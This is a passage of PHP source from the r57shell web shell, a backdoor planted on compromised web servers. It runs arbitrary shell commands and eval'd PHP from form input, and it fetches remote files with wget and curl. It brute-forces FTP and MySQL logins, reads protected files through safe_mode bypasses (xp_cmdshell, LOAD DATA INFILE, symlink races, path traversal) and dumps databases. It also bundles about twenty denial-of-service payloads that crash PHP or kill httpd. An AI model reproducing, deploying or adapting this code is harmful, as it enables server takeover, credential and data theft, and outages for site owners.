@move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)

4875
4876
or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");

4877
4878
}

4879
4880
}

4881
4882
if (!empty($_POST['with']) &&!empty($_POST['rem_file']) &&!empty($_POST['loc_file']))

4883
4884
{

4885
4886
switch($_POST['with'])

4887
4888
{

4889
4890
case 'fopen':

4891
4892
$datafile = @implode("",@file($_POST['rem_file']));

4893
4894
if($datafile)

4895
4896
{

4897
4898
$w_file=@fopen($_POST['loc_file'],"wb") or @function_exists('file_put_contents') or err(0);

4899
4900
if($w_file)

4901
4902
{

4903
4904
@fwrite($w_file,$datafile) or @fputs($w_file,$datafile) or @file_put_contents($_POST['loc_file'],$datafile);

4905
4906
@fclose($w_file);

4907
4908
}

4909
4910
}

4911
4912
$_POST['cmd'] = '';

4913
4914
break;

4915
4916
case 'wget':

4917
4918
$_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";

4919
4920
break;

4921
4922
case 'fetch':

4923
4924
$_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";

4925
4926
break;

4927
4928
case 'lynx':

4929
4930
$_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";

4931
4932
break;

4933
4934
case 'links':

4935
4936
$_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";

4937
4938
break;

4939
4940
case 'GET':

4941
4942
$_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";

4943
4944
break;

4945
4946
case 'curl':

4947
4948
$_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";

4949
4950
break;

4951
4952
}

4953
4954
}

4955
4956
if(!empty($_POST['cmd']) &&(($_POST['cmd']=="ftp_file_up") ||($_POST['cmd']=="ftp_file_down")))

4957
4958
{

4959
4960
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);

4961
4962
if(empty($ftp_port)) {$ftp_port = 21;}

4963
4964
$connection = @ftp_connect ($ftp_server,$ftp_port,10);

4965
4966
if(!$connection) {err(3);}

4967
4968
else 

4969
4970
{

4971
4972
if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) {err(4);}

4973
4974
else 

4975
4976
{

4977
4978
if($_POST['cmd']=="ftp_file_down") {if(chop($_POST['loc_file'])==$dir) {$_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']);}@ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}

4979
4980
if($_POST['cmd']=="ftp_file_up")   {@ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}

4981
4982
}

4983
4984
}

4985
4986
@ftp_close($connection);

4987
4988
$_POST['cmd'] = "";

4989
4990
}

4991
4992
if(!empty($_POST['cmd']) &&(($_POST['cmd']=="ftp_brute") ||($_POST['cmd']=="db_brute")))

4993
4994
{

4995
4996
if($_POST['cmd']=="ftp_brute"){

4997
4998
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);

4999
5000
if(empty($ftp_port)) {$ftp_port = 21;}

5001
5002
$connection = @ftp_connect ($ftp_server,$ftp_port,10);

5003
5004
}else if($_POST['cmd']=="db_brute"){

5005
5006
$connection = 1;

5007
5008
}

5009
5010
if(!$connection) {err(3);$_POST['cmd'] = "";}

5011
5012
else if(($_POST['brute_method']=='passwd') &&(!$users=get_users('/etc/passwd'))){echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>";$_POST['cmd'] = "";}

5013
5014
else if(($_POST['brute_method']=='dic') &&(!$users=get_users($_POST['dictionary']))){echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>";$_POST['cmd'] = "";}

5015
5016
if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}

5017
5018
}

5019
5020
echo $table_up3;

5021
5022
if (empty($_POST['cmd']) &&!$safe_mode &&!$open_basedir) {$_POST['cmd']=(!$unix)?("dir"):("ls -lia");}

5023
5024
else if(empty($_POST['cmd']) &&($safe_mode ||$open_basedir)){$_POST['cmd']="safe_dir";}

5025
5026
echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";

5027
5028
if($safe_mode ||$open_basedir)

5029
5030
{

5031
5032
switch($_POST['cmd'])

5033
5034
{

5035
5036
case 'safe_dir':

5037
5038
$d=@dir($dir);

5039
5040
if ($d)

5041
5042
{

5043
5044
while (false!==($file=$d->read()))

5045
5046
{

5047
5048
if ($file=="."||$file=="..") continue;

5049
5050
@clearstatcache();

5051
5052
@list ($dev,$inode,$inodep,$nlink,$uid,$gid,$inodev,$size,$atime,$mtime,$ctime,$bsize) = stat($file);

5053
5054
if(!$unix){

5055
5056
echo date("d.m.Y H:i",$mtime);

5057
5058
if(@is_dir($file)) echo "  <DIR> ";else printf("% 7s ",$size);

5059
5060
}

5061
5062
else{

5063
5064
if(@function_exists('posix_getpwuid')){

5065
5066
$owner = @posix_getpwuid($uid);

5067
5068
$grgid = @posix_getgrgid($gid);

5069
5070
}else{$owner['name']=$grgid['name']='';}

5071
5072
echo $inode." ";

5073
5074
echo perms(@fileperms($file));

5075
5076
@printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);

5077
5078
echo date("d.m.Y H:i ",$mtime);

5079
5080
}

5081
5082
echo "$file\n";

5083
5084
}

5085
5086
$d->close();

5087
5088
}

5089
5090
else if(@function_exists('glob'))

5091
5092
{

5093
5094
function eh($errno,$errstr,$errfile,$errline)

5095
5096
{

5097
5098
global $D,$c,$i;

5099
5100
preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/",$errstr,$o);

5101
5102
if($o){$D[$c] = $o[2];$c++;}

5103
5104
}

5105
5106
$error_reporting = @ini_get('error_reporting');

5107
5108
error_reporting(E_WARNING);

5109
5110
@ini_set("display_errors",1);

5111
5112
$root = "/";

5113
5114
if($dir) $root = $dir;

5115
5116
$c = 0;$D = array();

5117
5118
@set_error_handler("eh");

5119
5120
$chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";

5121
5122
for($i=0;$i <strlen($chars);$i++)

5123
5124
{

5125
5126
$path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}";

5127
5128
$prevD = $D[count($D)-1];

5129
5130
@glob($path."*");

5131
5132
if($D[count($D)-1] != $prevD)

5133
5134
{

5135
5136
for($j=0;$j <strlen($chars);$j++)

5137
5138
{

5139
5140
$path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}";

5141
5142
$prevD2 = $D[count($D)-1];

5143
5144
@glob($path."*");

5145
5146
if($D[count($D)-1] != $prevD2)

5147
5148
{

5149
5150
for($p=0;$p <strlen($chars);$p++)

5151
5152
{

5153
5154
$path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";

5155
5156
$prevD3 = $D[count($D)-1];

5157
5158
@glob($path."*");

5159
5160
if($D[count($D)-1] != $prevD3)

5161
5162
{

5163
5164
for($r=0;$r <strlen($chars);$r++)

5165
5166
{

5167
5168
$path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";

5169
5170
@glob($path."*");

5171
5172
}

5173
5174
}

5175
5176
}

5177
5178
}

5179
5180
}

5181
5182
}

5183
5184
}

5185
5186
$D = array_unique($D);

5187
5188
foreach($D as $item) echo htmlspecialchars("{$item}")."\r\n";

5189
5190
error_reporting($error_reporting);

5191
5192
}

5193
5194
else echo $lang[$language.'_text29'];

5195
5196
break;

5197
5198
case 'test1':

5199
5200
$ci = @curl_init("file://".$_POST['test1_file']);

5201
5202
$cf = @curl_exec($ci);

5203
5204
echo htmlspecialchars($cf);

5205
5206
break;

5207
5208
case 'test2':

5209
5210
@include($_POST['test2_file']);

5211
5212
break;

5213
5214
case 'test3':

5215
5216
if(empty($_POST['test3_port'])) {$_POST['test3_port'] = "3306";}

5217
5218
$db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);

5219
5220
if($db)

5221
5222
{

5223
5224
if(@mysql_select_db($_POST['test3_md'],$db))

5225
5226
{

5227
5228
@mysql_query("DROP TABLE IF EXISTS temp_r57_table");

5229
5230
@mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");

5231
5232
@mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");

5233
5234
$r = @mysql_query("SELECT * FROM temp_r57_table");

5235
5236
while(($r_sql = @mysql_fetch_array($r))) {echo @htmlspecialchars($r_sql[0])."\r\n";}

5237
5238
@mysql_query("DROP TABLE IF EXISTS temp_r57_table");

5239
5240
}

5241
5242
else echo "[-] ERROR! Can't select database";

5243
5244
@mysql_close($db);

5245
5246
}

5247
5248
else echo "[-] ERROR! Can't connect to mysql server";

5249
5250
break;

5251
5252
case 'test4':

5253
5254
if(empty($_POST['test4_port'])) {$_POST['test4_port'] = "1433";}

5255
5256
$db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);

5257
5258
if($db)

5259
5260
{

5261
5262
if(@mssql_select_db($_POST['test4_md'],$db))

5263
5264
{

5265
5266
@mssql_query("drop table r57_temp_table",$db);

5267
5268
@mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);

5269
5270
@mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);

5271
5272
$res = mssql_query("select * from r57_temp_table",$db);

5273
5274
while(($row=@mssql_fetch_row($res)))

5275
5276
{

5277
5278
echo htmlspecialchars($row[0])."\r\n";

5279
5280
}

5281
5282
@mssql_query("drop table r57_temp_table",$db);

5283
5284
}

5285
5286
else echo "[-] ERROR! Can't select database";

5287
5288
@mssql_close($db);

5289
5290
}

5291
5292
else echo "[-] ERROR! Can't connect to MSSQL server";

5293
5294
break;

5295
5296
case 'test5':

5297
5298
$temp=tempnam($dir,"fname");

5299
5300
if (@file_exists($temp)) @unlink($temp);

5301
5302
$extra = "-C ".$_POST['test5_file']." -X $temp";

5303
5304
@mb_send_mail(NULL,NULL,NULL,NULL,$extra);

5305
5306
$str = moreread($temp);

5307
5308
echo htmlspecialchars($str);

5309
5310
@unlink($temp);

5311
5312
break;

5313
5314
case 'test6':

5315
5316
$stream = @imap_open('/etc/passwd',"","");

5317
5318
$dir_list = @imap_list($stream,trim($_POST['test6_file']),"*");

5319
5320
for ($i = 0;$i <count($dir_list);$i++) echo htmlspecialchars($dir_list[$i])."\r\n";

5321
5322
@imap_close($stream);

5323
5324
break;

5325
5326
case 'test7':

5327
5328
$stream = @imap_open($_POST['test7_file'],"","");

5329
5330
$str = @imap_body($stream,1);

5331
5332
echo htmlspecialchars($str);

5333
5334
@imap_close($stream);

5335
5336
break;

5337
5338
case 'test8':

5339
5340
$temp=@tempnam($_POST['test8_file2'],"copytemp");

5341
5342
$str = readzlib($_POST['test8_file1'],$temp);

5343
5344
echo htmlspecialchars($str);

5345
5346
@unlink($temp);

5347
5348
break;

5349
5350
case 'test9':

5351
5352
@ini_restore("safe_mode");

5353
5354
@ini_restore("open_basedir");

5355
5356
$str = moreread($_POST['test9_file']);

5357
5358
echo htmlspecialchars($str);

5359
5360
break;

5361
5362
case 'test10':

5363
5364
@ob_clean();

5365
5366
$error_reporting = @ini_get('error_reporting');

5367
5368
error_reporting(E_ALL ^E_NOTICE);

5369
5370
@ini_set("display_errors",1);

5371
5372
$str=fopen($_POST['test10_file'],"r");

5373
5374
while(!feof($str)){print htmlspecialchars(fgets($str));}

5375
5376
fclose($str);

5377
5378
error_reporting($error_reporting);

5379
5380
break;

5381
5382
case 'test11':

5383
5384
@ob_clean();

5385
5386
$temp = 'zip://'.$_POST['test11_file'];

5387
5388
$str = moreread($temp);

5389
5390
echo htmlspecialchars($str);

5391
5392
break;

5393
5394
case 'test12':

5395
5396
@ob_clean();

5397
5398
$temp = 'compress.bzip2://'.$_POST['test12_file'];

5399
5400
$str = moreread($temp);

5401
5402
echo htmlspecialchars($str);

5403
5404
break;

5405
5406
case 'test13':

5407
5408
@error_log($_POST['test13_file1'],3,"php://../../../../../../../../../../../".$_POST['test13_file2']);

5409
5410
echo $lang[$language.'_text61'];

5411
5412
break;

5413
5414
case 'test14':

5415
5416
@session_save_path($_POST['test14_file2']."\0;/tmp");

5417
5418
@session_start();

5419
5420
@$_SESSION[php]=$_POST['test14_file1'];

5421
5422
echo $lang[$language.'_text61'];

5423
5424
break;

5425
5426
case 'test15':

5427
5428
@readfile($_POST['test15_file1'],3,"php://../../../../../../../../../../../".$_POST['test15_file2']);

5429
5430
echo $lang[$language.'_text61'];

5431
5432
break;

5433
5434
case 'test16':

5435
5436
if (fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];

5437
5438
break;

5439
5440
case 'test17_1':

5441
5442
@unlink('symlinkread');

5443
5444
@symlink('a/a/a/a/a/a/','dummy');

5445
5446
@symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'],'symlinkread');

5447
5448
@unlink('dummy');

5449
5450
while (1) 

5451
5452
{

5453
5454
@symlink('.','dummy');

5455
5456
@unlink('dummy');

5457
5458
}

5459
5460
break;

5461
5462
case 'test17_2':

5463
5464
$str='';

5465
5466
while (strlen($str) <3) {

5467
5468
$temp = 'symlinkread';

5469
5470
$str = moreread($temp);

5471
5472
if($str){@ob_clean();echo htmlspecialchars($str);}

5473
5474
}

5475
5476
break;

5477
5478
case 'test17_3':

5479
5480
$dir = $files = array();

5481
5482
if(@version_compare(@phpversion(),"5.0.0")>=0){

5483
5484
while (@count($dir) <3) {

5485
5486
$dir=@scandir('symlinkread');

5487
5488
if (@count($dir) >2) {@ob_clean();@print_r($dir);}

5489
5490
}

5491
5492
}

5493
5494
else {

5495
5496
while (@count($files) <3) {

5497
5498
$dh  = @opendir('symlinkread');

5499
5500
while (false !== ($filename = @readdir($dh))) {

5501
5502
$files[] = $filename;

5503
5504
}

5505
5506
if(@count($files) >2){@ob_clean();@print_r($files);}

5507
5508
}

5509
5510
}

5511
5512
break;

5513
5514
}

5515
5516
}

5517
5518
if((!$safe_mode) &&($_POST['cmd']!="php_eval") &&($_POST['cmd']!="mysql_dump") &&($_POST['cmd']!="db_query") &&($_POST['cmd']!="ftp_brute") &&($_POST['cmd']!="db_brute")){

5519
5520
$cmd_rep = ex($_POST['cmd']);

5521
5522
if(!$unix) {echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n";}

5523
5524
else {echo @htmlspecialchars($cmd_rep)."\n";}}

5525
5526
switch($_POST['cmd'])

5527
5528
{

5529
5530
case 'dos1':

5531
5532
function a() {a();}a();

5533
5534
break;

5535
5536
case 'dos2':

5537
5538
@pack("d4294967297",2);

5539
5540
break;

5541
5542
case 'dos3':

5543
5544
$a = "a";@unserialize(@str_replace('1',2147483647,@serialize($a)));

5545
5546
break;

5547
5548
case 'dos4':

5549
5550
$t = array(1);while (1) {$a[] = &$t;};

5551
5552
break;

5553
5554
case 'dos5':

5555
5556
@dl("sqlite.so");$db = new SqliteDatabase("foo");

5557
5558
break;

5559
5560
case 'dos6':

5561
5562
preg_match('/(.(?!b))*/',@str_repeat("a",10000));

5563
5564
break;

5565
5566
case 'dos7':

5567
5568
@str_replace("A",str_repeat("B",65535),str_repeat("A",65538));

5569
5570
break;

5571
5572
case 'dos8':

5573
5574
@shell_exec("killall -11 httpd");

5575
5576
break;

5577
5578
case 'dos9':

5579
5580
function cx(){@tempnam("/www/","../../../../../../var/tmp/cx");cx();}cx();

5581
5582
break;

5583
5584
case 'dos10':

5585
5586
$a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);

5587
5588
break;

5589
5590
case 'dos11':

5591
5592
@array_fill(1,123456789,"Infigo-IS");

5593
5594
break;

5595
5596
case 'dos12':

5597
5598
@substr_compare("A","A",12345678);

5599
5600
break;

5601
5602
case 'dos13':

5603
5604
@unserialize("a:2147483649:{");

5605
5606
break;

5607
5608
case 'dos14':

5609
5610
$Data = @str_ireplace("\n","<br>",$Data);

5611
5612
break;

5613
5614
case 'dos15':

5615
5616
function toUTF($x) {return chr(($x >>6) +192) .chr(($x &63) +128);}

5617
5618
$str1 = "";for($i=0;$i <64;$i++){$str1 .= toUTF(977);}

5619
5620
@htmlentities($str1,ENT_NOQUOTES,"UTF-8");

5621
5622
break;

5623
5624
case 'dos16':

5625
5626
$r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r,$e);

5627
5628
for ($i=0;$i<1000;$i++) $arr[$i]=array(array(""));

5629
5630
unset($arr[600]);@zip_entry_read($e,-1);unset($arr[601]);

5631
5632
break;

5633
5634
case 'dos17':

5635
5636
$z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";

5637
5638
$y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";

5639
5640
$x = "AQ                                                                        ";

5641
5642
unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);

5643
5644
break;

5645
5646
case 'dos18':

5647
5648
$MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY,0600);

5649
5650
if (!@msg_send ($msg_id,1,'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH',false,true,$msg_err)) 

5651
5652
echo "Msg not sent because $msg_err\n";

5653
5654
if (@msg_receive ($msg_id,1,$msg_type,0xffffffff,$_SESSION,false,0,$msg_error)) {

5655
5656
echo "$msg\n";

5657
5658
}else {echo "Received $msg_error fetching message\n";break;}

5659
5660
@msg_remove_queue ($msg_id);

5661
5662
break;

5663
5664
case 'dos19':

5665
5666
$url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd";@fopen($url,"r");

5667
5668
break;

5669
5670
case 'dos20':

5671
5672
$hashtable = str_repeat("A",39);

5673
5674
$hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);

5675
5676
$hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);

5677
5678
$str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';

5679
5680
for ($i=0;$i<65535;$i++) {$str .= 'i:0;R:2;';}

5681
5682
$str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';

5683
5684
@unserialize($str);

5685
5686
break;

5687
5688
}

5689
5690
if ($_POST['cmd']=="php_eval"){

5691
5692
$eval = @str_replace("<?","",$_POST['php_eval']);

5693
5694
$eval = @str_replace("?>","",$eval);

5695
5696
@eval($eval);}

5697
5698
if ($_POST['cmd']=="ftp_brute")

5699
5700
{

5701
5702
$suc = 0;

5703
5704
if($_POST['brute_method']=='passwd'){

5705
5706
foreach($users as $user)

5707
5708
{

5709
5710
$connection = @ftp_connect($ftp_server,$ftp_port,10);

5711
5712
if(@ftp_login($connection,$user,$user)) {echo "[+] $user:$user - success\r\n";$suc++;}

5713
5714
else if(isset($_POST['reverse'])) {if(@ftp_login($connection,$user,strrev($user))) {echo "[+] $user:".strrev($user)." - success\r\n";$suc++;}}

5715
5716
@ftp_close($connection);

5717
5718
}

5719
5720
}else if(($_POST['brute_method']=='dic') &&isset($_POST['ftp_login'])){

5721
5722
foreach($users as $user)

5723
5724
{

5725
5726
$connection = @ftp_connect($ftp_server,$ftp_port,10);

5727
5728
if(@ftp_login($connection,$_POST['ftp_login'],$user)) {echo "[+] ".$_POST['ftp_login'].":$user - success\r\n";$suc++;}

5729
5730
@ftp_close($connection);

5731
5732
}

5733
5734
}

5735
5736
echo "\r\n-------------------------------------\r\n";

5737
5738
$count = count($users);

5739
5740
if(isset($_POST['reverse']) &&($_POST['brute_method']=='passwd')) {$count *= 2;}

5741
5742
echo $lang[$language.'_text97'].$count."\r\n";

5743
5744
echo $lang[$language.'_text98'].$suc."\r\n";

5745
5746
}

5747
5748
if ($_POST['cmd']=="db_brute")

5749
5750
{

5751
5752
$suc = 0;

5753
5754
if($_POST['brute_method']=='passwd'){

5755
5756
foreach($users as $user)

5757
5758
{

5759
5760
$sql = new my_sql();

5761
5762
$sql->db   = $_POST['db'];

5763
5764
$sql->host = $_POST['db_server'];

5765
5766
$sql->port = $_POST['db_port'];

5767
5768
$sql->user = $user;

5769
5770
$sql->pass = $user;

5771
5772
if($sql->connect()) {echo "[+] $user:$user - success\r\n";$suc++;}

5773
5774
}

5775
5776
if(isset($_POST['reverse']))

5777
5778
{

5779
5780
foreach($users as $user)

5781
5782
{

5783
5784
$sql = new my_sql();

5785
5786
$sql->db   = $_POST['db'];

5787
5788
$sql->host = $_POST['db_server'];

5789
5790
$sql->port = $_POST['db_port'];

5791
5792
$sql->user = $user;

5793
5794
$sql->pass = strrev($user);

5795
5796
if($sql->connect()) {echo "[+] $user:".strrev($user)." - success\r\n";$suc++;}

5797
5798
}

5799
5800
}

5801
5802
}else if(($_POST['brute_method']=='dic') &&isset($_POST['mysql_l'])){

5803
5804
foreach($users as $user)

5805
5806
{

5807
5808
$sql = new my_sql();

5809
5810
$sql->db   = $_POST['db'];

5811
5812
$sql->host = $_POST['db_server'];

5813
5814
$sql->port = $_POST['db_port'];

5815
5816
$sql->user = $_POST['mysql_l'];

5817
5818
$sql->pass = $user;

5819
5820
if($sql->connect()) {echo "[+] ".$_POST['mysql_l'].":$user - success\r\n";$suc++;}

5821
5822
}

5823
5824
}

5825
5826
echo "\r\n-------------------------------------\r\n";

5827
5828
$count = count($users);

5829
5830
if(isset($_POST['reverse']) &&($_POST['brute_method']=='passwd')) {$count *= 2;}

5831
5832
echo $lang[$language.'_text97'].$count."\r\n";

5833
5834
echo $lang[$language.'_text98'].$suc."\r\n";

5835
5836
}

5837
5838
if ($_POST['cmd']=="mysql_dump")

5839
5840
{

5841
5842
if(isset($_POST['dif'])) {$fp = @fopen($_POST['dif_name'],"w");}

5843
5844
$sql = new my_sql();

5845
5846
$sql->db   = $_POST['db'];

5847
5848
$sql->host = $_POST['db_server'];

5849
5850
$sql->port = $_POST['db_port'];

5851
5852
$sql->user = $_POST['mysql_l'];

5853
5854
$sql->pass = $_POST['mysql_p'];

5855
5856
$sql->base = $_POST['mysql_db'];

5857
5858
if(!$sql->connect()) {echo "[-] ERROR! Can't connect to SQL server";}

5859
5860
else if(!$sql->select_db()) {echo "[-] ERROR! Can't select database";}

5861
5862
else if(!$sql->dump($_POST['mysql_tbl'])) {echo "[-] ERROR! Can't create dump";}

5863
5864
else {

5865
5866
if(empty($_POST['dif'])) {foreach($sql->dump as $v) echo $v."\r\n";}

5867
5868
else if($fp ||@function_exists('file_put_contents')){foreach($sql->dump as $v){@fwrite($fp,$v."\r\n") or @fputs($fp,$v."\r\n") or @file_put_contents($_POST['dif_name'],$v."\r\n");}}

5869
5870
else {echo "[-] ERROR! Can't write in dump file";}

5871
5872
}

5873
5874
}

5875
5876
echo "</textarea></div>";

5877
5878
echo "</b>";

5879
5880
echo "</td></tr></table>";

5881
5882
echo "<table width=100% cellpadding=0 cellspacing=0>";

5883
5884
function div_title($title,$id)

5885
5886
{

5887
5888
return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';

5889
5890
}

5891
5892
function div($id)

5893
5894
{

5895
5896
if(isset($_COOKIE[$id]) &&($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">';

5897
5898
$divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38');

5899
5900
if(empty($_COOKIE[$id]) &&@in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">';

5901
5902
return '<div id="'.$id.'">';

5903
5904
}

5905
5906
if(!$safe_mode){

5907
5908
echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;

5909
5910
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));

5911
5912
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));

5913
5914
echo $te.'</div>'.$table_end1.$fe;

5915
5916
}

5917
5918
else{

5919
5920
echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;

5921
5922
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));

5923
5924
echo $te.'</div>'.$table_end1.$fe;

5925
5926
}

5927
5928
echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;

5929
5930
echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));

5931
5932
echo $te.'</div>'.$table_end1.$fe;

5933
5934
if($safe_mode ||$open_basedir){

5935
5936
echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;

5937
5938
echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));

5939
5940
echo $te.'</div>'.$table_end1.$fe;

5941
5942
}

5943
5944
if($unix &&@function_exists('touch')){

5945
5946
echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;

5947
5948
echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($dir."/r57shell.php")))

5949
5950
.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>"

5951
5952
.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));

5953
5954
echo sr(15,"<b> or set  Day".$arrow."</b>",

5955
5956
'

5957
5958
<select name="day" size="1">

5959
5960
<option value="01">1</option>

5961
5962
<option value="02">2</option>

5963
5964
<option value="03">3</option>

5965
5966
<option value="04">4</option>

5967
5968
<option value="05">5</option>

5969
5970
<option value="06">6</option>

5971
5972
<option value="07">7</option>

5973
5974
<option value="08">8</option>

5975
5976
<option value="09">9</option>

5977
5978
<option value="10">10</option>

5979
5980
<option value="11">11</option>

5981
5982
<option value="12">12</option>

5983
5984
<option value="13">13</option>

5985
5986
<option value="14">14</option>

5987
5988
<option value="15">15</option>

5989
5990
<option value="16">16</option>

5991
5992
<option value="17">17</option>

5993
5994
<option value="18">18</option>

5995
5996
<option value="19">19</option>

5997
5998
<option value="20">20</option>

5999
6000
<option value="21">21</option>

6001
6002
<option value="22">22</option>

6003
6004
<option value="23">23</option>

6005
6006
<option value="24">24</option>

6007
6008
<option value="25">25</option>

6009
6010
<option value="26">26</option>

6011
6012
<option value="27">27</option>

6013
6014
<option value="28">28</option>

6015
6016
<option value="29">29</option>

6017
6018
<option value="30">30</option>

6019
6020
<option value="31">31</option>

6021
6022
</select>'

6023
6024
.ws(4)."<b>Month".$arrow."</b>"

6025
6026
.'

6027
6028
<select name="month" size="1">

6029
6030
<option value="January">January</option>

6031
6032
<option value="February">February</option>

6033
6034
<option value="March">March</option>

6035
6036
<option value="April">April</option>

6037
6038
<option value="May">May</option>

6039
6040
<option value="June">June</option>

6041
6042
<option value="July">July</option>

6043
6044
<option value="August">August</option>

6045
6046
<option value="September">September</option>

6047
6048
<option value="October">October</option>

6049
6050
<option value="November">November</option>

6051
6052
<option value="December">December</option>

6053
6054
</select>'

6055
6056
.ws(4)."<b>Year".$arrow."</b>"

6057
6058
.'

6059
6060
<select name="year" size="1">

6061
6062
<option value="1998">1998</option>

6063
6064
<option value="1999">1999</option>

6065
6066
<option value="2000">2000</option>

6067
6068
<option value="2001">2001</option>

6069
6070
<option value="2002">2002</option>

6071
6072
<option value="2003">2003</option>

6073
6074
<option value="2004">2004</option>

6075
6076
<option value="2005">2005</option>

6077
6078
<option value="2006">2006</option>

6079
6080
